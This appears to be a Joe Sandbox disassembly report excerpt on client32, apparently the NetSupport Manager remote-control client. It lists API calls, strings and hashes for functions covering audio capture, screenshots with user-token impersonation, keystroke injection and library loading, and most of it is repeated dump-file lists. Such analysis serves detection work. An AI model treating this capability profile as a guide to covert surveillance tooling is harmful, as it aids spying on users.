                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ControlDevicekeybd_event
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1421710848-0
                                                                                                                              • Opcode ID: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                                                                              • Instruction ID: d69eaa5760cfcdb7a6e8037c3782fd2f7db196db4b5aaba7e7bab0ff0a721f20
                                                                                                                              • Opcode Fuzzy Hash: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                                                                              • Instruction Fuzzy Hash: E4012432F55A1539F30489B99E45FE7FA2CAB40721F014278EE59AB2C8DAA09904C6A0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1100C530 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 185libraryloaderthreadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                              • InitializeCriticalSection.KERNEL32(00000010), ref: 1100C587
                                                                                                                              • InitializeCriticalSection.KERNEL32(00000028), ref: 1100C58D
                                                                                                                              • InitializeCriticalSection.KERNEL32(00000040), ref: 1100C593
                                                                                                                              • InitializeCriticalSection.KERNEL32(00000058), ref: 1100C599
                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1100C5A3
                                                                                                                              • GetVersion.KERNEL32 ref: 1100C6AE
                                                                                                                              • LoadLibraryA.KERNEL32(msacm32.dll), ref: 1100C6BF
                                                                                                                              • GetProcAddress.KERNEL32(00000000,acmStreamOpen), ref: 1100C6DB
                                                                                                                              • GetProcAddress.KERNEL32(?,acmStreamClose), ref: 1100C6EF
                                                                                                                              • GetProcAddress.KERNEL32(?,acmStreamSize), ref: 1100C703
                                                                                                                              • GetProcAddress.KERNEL32(?,acmStreamPrepareHeader), ref: 1100C717
                                                                                                                              • GetProcAddress.KERNEL32(?,acmStreamConvert), ref: 1100C72B
                                                                                                                              • CreateThread.KERNEL32 ref: 1100C75A
                                                                                                                              • GetProcAddress.KERNEL32(?,acmStreamUnprepareHeader), ref: 1100C73F
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              • SetThreadPriority.KERNEL32(00000000,00000001), ref: 1100C780
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 1100C787
                                                                                                                                • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$CriticalInitializeSection$CreateExitProcessThreadwsprintf$CloseErrorEventHandleLastLibraryLoadMessagePriorityVersion_malloc_memset_strrchr
                                                                                                                              • String ID: ..\ctl32\AUDIO.CPP$acmStreamClose$acmStreamConvert$acmStreamOpen$acmStreamPrepareHeader$acmStreamSize$acmStreamUnprepareHeader$hAudio$idata->hEvent$msacm32.dll
                                                                                                                              • API String ID: 164558982-2117072583
                                                                                                                              • Opcode ID: 255ff40716cd6c304099b77a5886bc9bde90bf44559b459c23a0683a6695907f
                                                                                                                              • Instruction ID: 049fab11b20bb768323fb1b34283fa62b23a8e76d4d9a3094b6e7a7a4f077f96
                                                                                                                              • Opcode Fuzzy Hash: 255ff40716cd6c304099b77a5886bc9bde90bf44559b459c23a0683a6695907f
                                                                                                                              • Instruction Fuzzy Hash: FD61AEB5A40709ABEB20DFB5CD45BDAFBE4AF54304F00492EE96AD7280EB74B500CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11020310 Relevance: 38.8, APIs: 18, Strings: 4, Instructions: 269windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Item$Enable$RectShow$UpdateVisiblewsprintf
                                                                                                                              • String ID: NSMChatExDlg::OnWhiteBoard - Mode %d$e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                              • API String ID: 1139678934-4020333243
                                                                                                                              • Opcode ID: bf302f3f50b72fa046df3b71313cba82a1b11e2870ffdb6b8516b1e7006a154a
                                                                                                                              • Instruction ID: d891f5d5e415915a6e5e6ee3e5f20cb4cdde8798b9037e3cc37bb1097e49140c
                                                                                                                              • Opcode Fuzzy Hash: bf302f3f50b72fa046df3b71313cba82a1b11e2870ffdb6b8516b1e7006a154a
                                                                                                                              • Instruction Fuzzy Hash: D7A1B174B40319AFE710CF60CC89F9EB7E6BB88708F108658F5166B6C4C774A941CB94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11144580 Relevance: 38.7, APIs: 15, Strings: 7, Instructions: 191COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: wsprintf$_memset_strrchr
                                                                                                                              • String ID: (%d.%02d.%d.%d)$ + %d bytes$%s + %d bytes$, %s, Line %d$0x%08X $<unknown module>$<unknown symbol>
                                                                                                                              • API String ID: 4236257132-983257157
                                                                                                                              • Opcode ID: a0ef6df3c23f1de90c9332116cf72623786e7006b97500c467b7cdb199fce978
                                                                                                                              • Instruction ID: 293bca24da915293cfb006549a27a8b3087cf55c4de6a639cfa4b0299eb0fa9d
                                                                                                                              • Opcode Fuzzy Hash: a0ef6df3c23f1de90c9332116cf72623786e7006b97500c467b7cdb199fce978
                                                                                                                              • Instruction Fuzzy Hash: 675185B1940629ABDB25CB258C40FEAF3BCAF45708F0041D9FD08A2640EB75AB55CFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11146270 Relevance: 38.6, APIs: 11, Strings: 11, Instructions: 58libraryloaderCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 11143CE0: GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 11143D1B
                                                                                                                                • Part of subcall function 11143CE0: _strrchr.LIBCMT ref: 11143D2A
                                                                                                                                • Part of subcall function 11143CE0: _strrchr.LIBCMT ref: 11143D3A
                                                                                                                                • Part of subcall function 11143CE0: wsprintfA.USER32 ref: 11143D55
                                                                                                                              • GetModuleHandleA.KERNEL32(NSMTRACE,11195AD8), ref: 1114628A
                                                                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceLoad), ref: 111462A5
                                                                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceUnload), ref: 111462B2
                                                                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigItem), ref: 111462BF
                                                                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigInt), ref: 111462CC
                                                                                                                              • GetProcAddress.KERNEL32(00000000,vRealNSMTrace), ref: 111462D9
                                                                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceClose), ref: 111462E6
                                                                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceReadConfigItemFromFile), ref: 111462F3
                                                                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceExclusive), ref: 11146300
                                                                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceUnexclusive), ref: 1114630D
                                                                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceSetModuleName), ref: 1114631A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$Module_strrchr$FileHandleNamewsprintf
                                                                                                                              • String ID: NSMTRACE$NSMTraceClose$NSMTraceExclusive$NSMTraceGetConfigInt$NSMTraceGetConfigItem$NSMTraceLoad$NSMTraceReadConfigItemFromFile$NSMTraceSetModuleName$NSMTraceUnexclusive$NSMTraceUnload$vRealNSMTrace
                                                                                                                              • API String ID: 3896832720-3703587661
                                                                                                                              • Opcode ID: 4a9ea036915f179722395e8dc0fd9ac4a12141907cda7860a4eb47a17f8f2bf1
                                                                                                                              • Instruction ID: f57ee56c394f0cb9b00f8b4099bcc1512020c1dff5e65ba52801e9a68d189d03
                                                                                                                              • Opcode Fuzzy Hash: 4a9ea036915f179722395e8dc0fd9ac4a12141907cda7860a4eb47a17f8f2bf1
                                                                                                                              • Instruction Fuzzy Hash: 5A01827491123666CB157F7B9C98ECBFEBC9B8631CB814436F41493506D6B89004CF95
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1100C0F0 Relevance: 35.3, APIs: 15, Strings: 5, Instructions: 332sleepCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • InterlockedIncrement.KERNEL32(111EDE24), ref: 1100C10D
                                                                                                                              • WaitForMultipleObjects.KERNEL32(?,?,00000000,?), ref: 1100C1D3
                                                                                                                              • GetLastError.KERNEL32(?,?,00000000,?), ref: 1100C1E0
                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 1100C204
                                                                                                                              • GetTickCount.KERNEL32 ref: 1100C24D
                                                                                                                              • _free.LIBCMT ref: 1100C28A
                                                                                                                                • Part of subcall function 1100B440: _malloc.LIBCMT ref: 1100B496
                                                                                                                                • Part of subcall function 1100B440: EnterCriticalSection.KERNEL32(1100CB8A,Audio,DisableSounds,00000000,00000000,30AC22AD,?,1100CB7A,00000000,?,1100CB7A,?), ref: 1100B4CB
                                                                                                                                • Part of subcall function 1100B440: CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CB7A,?), ref: 1100B4E8
                                                                                                                                • Part of subcall function 1100B440: _calloc.LIBCMT ref: 1100B519
                                                                                                                                • Part of subcall function 1100B440: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CB7A,?), ref: 1100B53F
                                                                                                                                • Part of subcall function 1100B440: LeaveCriticalSection.KERNEL32(1100CB8A,?,1100CB7A,?), ref: 1100B579
                                                                                                                              • _free.LIBCMT ref: 1100C411
                                                                                                                              • GetTickCount.KERNEL32 ref: 1100C419
                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,00000000,?), ref: 1100C435
                                                                                                                              • waveInUnprepareHeader.WINMM(?,00000000,00000020,?,?,00000000,?), ref: 1100C442
                                                                                                                              • waveInPrepareHeader.WINMM(?,00000000,00000020,?,?,00000000,?), ref: 1100C44F
                                                                                                                              • waveInAddBuffer.WINMM(?,00000000,00000020,?,?,00000000,?), ref: 1100C45C
                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?), ref: 1100C463
                                                                                                                              • _free.LIBCMT ref: 1100C4C3
                                                                                                                              • InterlockedDecrement.KERNEL32(111EDE24), ref: 1100C506
                                                                                                                              Strings
                                                                                                                              • Audiothread started, threadcnt=%d, xrefs: 1100C119
                                                                                                                              • Audiothread stopped, threadcnt=%d, xrefs: 1100C513
                                                                                                                              • Vista AudioCap FreeInstance (pAudioCap=%p), xrefs: 1100C4E1
                                                                                                                              • Audio, xrefs: 1100C0FB
                                                                                                                              • Error %d waiting for audio (nEvents=%d), xrefs: 1100C1F2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalSection$_freewave$CountCreateEnterHeaderInterlockedLeaveTick$BufferDecrementErrorEventFileIncrementLastMultipleObjectsPrepareSleepUnprepareWait_calloc_malloc
                                                                                                                              • String ID: Audio$Audiothread started, threadcnt=%d$Audiothread stopped, threadcnt=%d$Error %d waiting for audio (nEvents=%d)$Vista AudioCap FreeInstance (pAudioCap=%p)
                                                                                                                              • API String ID: 4143487924-3268596948
                                                                                                                              • Opcode ID: 298505100148be32d1e9fec23b522e3c1f0abcd0da0ad9fbcc93395b7ec93c2b
                                                                                                                              • Instruction ID: ce4536ffc1536091952ef6b0c0b09b4d7bc44372ab8792d62394f68665881c24
                                                                                                                              • Opcode Fuzzy Hash: 298505100148be32d1e9fec23b522e3c1f0abcd0da0ad9fbcc93395b7ec93c2b
                                                                                                                              • Instruction Fuzzy Hash: 66C1E774E00717ABF708CFB4C984BAEF7A4FF45348F1082A5E96996641EB30B951CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11002340 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 162windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 11001F80: FindWindowA.USER32 ref: 11001FA9
                                                                                                                                • Part of subcall function 11001F80: GetWindowThreadProcessId.USER32(00000000,?), ref: 11001FB7
                                                                                                                                • Part of subcall function 11001F80: OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11001FCB
                                                                                                                                • Part of subcall function 11001F80: GetVersionExA.KERNEL32(?), ref: 11001FE4
                                                                                                                                • Part of subcall function 11001F80: OpenProcessToken.ADVAPI32(00000000,0002000B,00000000), ref: 11002000
                                                                                                                                • Part of subcall function 11001F80: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 11002011
                                                                                                                                • Part of subcall function 11001F80: CloseHandle.KERNEL32(00000000), ref: 11002028
                                                                                                                                • Part of subcall function 11001F80: CloseHandle.KERNEL32(00000000), ref: 1100202F
                                                                                                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 110023AD
                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 110023BD
                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 110023D1
                                                                                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 11002401
                                                                                                                              • _memset.LIBCMT ref: 11002419
                                                                                                                                • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                                              • GetSaveFileNameA.COMDLG32(00000058,?,?,?,30AC22AD), ref: 110024A4
                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 11002518
                                                                                                                              • SelectObject.GDI32(?,?), ref: 11002522
                                                                                                                              • DeleteObject.GDI32(?), ref: 1100252F
                                                                                                                              • DeleteDC.GDI32(?), ref: 11002536
                                                                                                                              • EnableWindow.USER32(00000000,00000001), ref: 1100255F
                                                                                                                              • RevertToSelf.ADVAPI32(?,?,?,30AC22AD), ref: 11002561
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$ObjectProcess$CloseCompatibleCreateDeleteEnableFileFolderHandleNameOpenPathSelect$BitmapFindImpersonateLoggedModuleRevertSaveSelfThreadTokenUserVersion_memset
                                                                                                                              • String ID: BMP$X$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                              • API String ID: 3362589479-2539113696
                                                                                                                              • Opcode ID: 707966891ba89dca208264028aa69297b782c98c3fb71acf7aedca3f39ebb5e9
                                                                                                                              • Instruction ID: 9d3051af6559d4f2dd0c7a1e2ead35f12597f10354149e4796aa47e8d90882b9
                                                                                                                              • Opcode Fuzzy Hash: 707966891ba89dca208264028aa69297b782c98c3fb71acf7aedca3f39ebb5e9
                                                                                                                              • Instruction Fuzzy Hash: 4D51A175E40319AFEB24CF60CC85FEAB7B8FB49748F0045A9E529A7680DB74A940CF51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110CB450 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 117registryclipboardCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • EnterCriticalSection.KERNEL32(111F3420,?,00000000,00000000,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB45E
                                                                                                                              • RegisterClipboardFormatA.USER32 ref: 110CB46F
                                                                                                                              • RegisterClipboardFormatA.USER32 ref: 110CB47B
                                                                                                                              • GetClassInfoExA.USER32(11000000,AtlAxWin100,?), ref: 110CB4A0
                                                                                                                              • LoadCursorA.USER32 ref: 110CB4D1
                                                                                                                              • RegisterClassExA.USER32(?), ref: 110CB4F2
                                                                                                                              • _memset.LIBCMT ref: 110CB51B
                                                                                                                              • GetClassInfoExA.USER32(11000000,AtlAxWinLic100,?), ref: 110CB536
                                                                                                                              • LoadCursorA.USER32 ref: 110CB56B
                                                                                                                              • RegisterClassExA.USER32(?), ref: 110CB58C
                                                                                                                              • LeaveCriticalSection.KERNEL32(111F3420,0000000E), ref: 110CB5B5
                                                                                                                              • LeaveCriticalSection.KERNEL32(111F3420,?,?,?,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB5CB
                                                                                                                                • Part of subcall function 110C2C00: __recalloc.LIBCMT ref: 110C2C48
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
